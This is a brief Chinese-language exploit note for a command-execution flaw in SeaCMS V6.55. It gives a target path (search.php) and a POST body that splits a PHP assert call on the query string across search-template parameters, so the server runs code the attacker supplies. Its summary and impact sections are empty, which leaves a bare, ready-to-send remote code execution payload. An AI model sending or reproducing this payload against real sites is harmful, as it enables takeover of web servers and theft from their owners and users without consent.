海洋CMS V6.55 命令执行

一、漏洞简介

二、漏洞影响

三、复现过程

path:

http://0-sec.org/search.php

POST:

searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/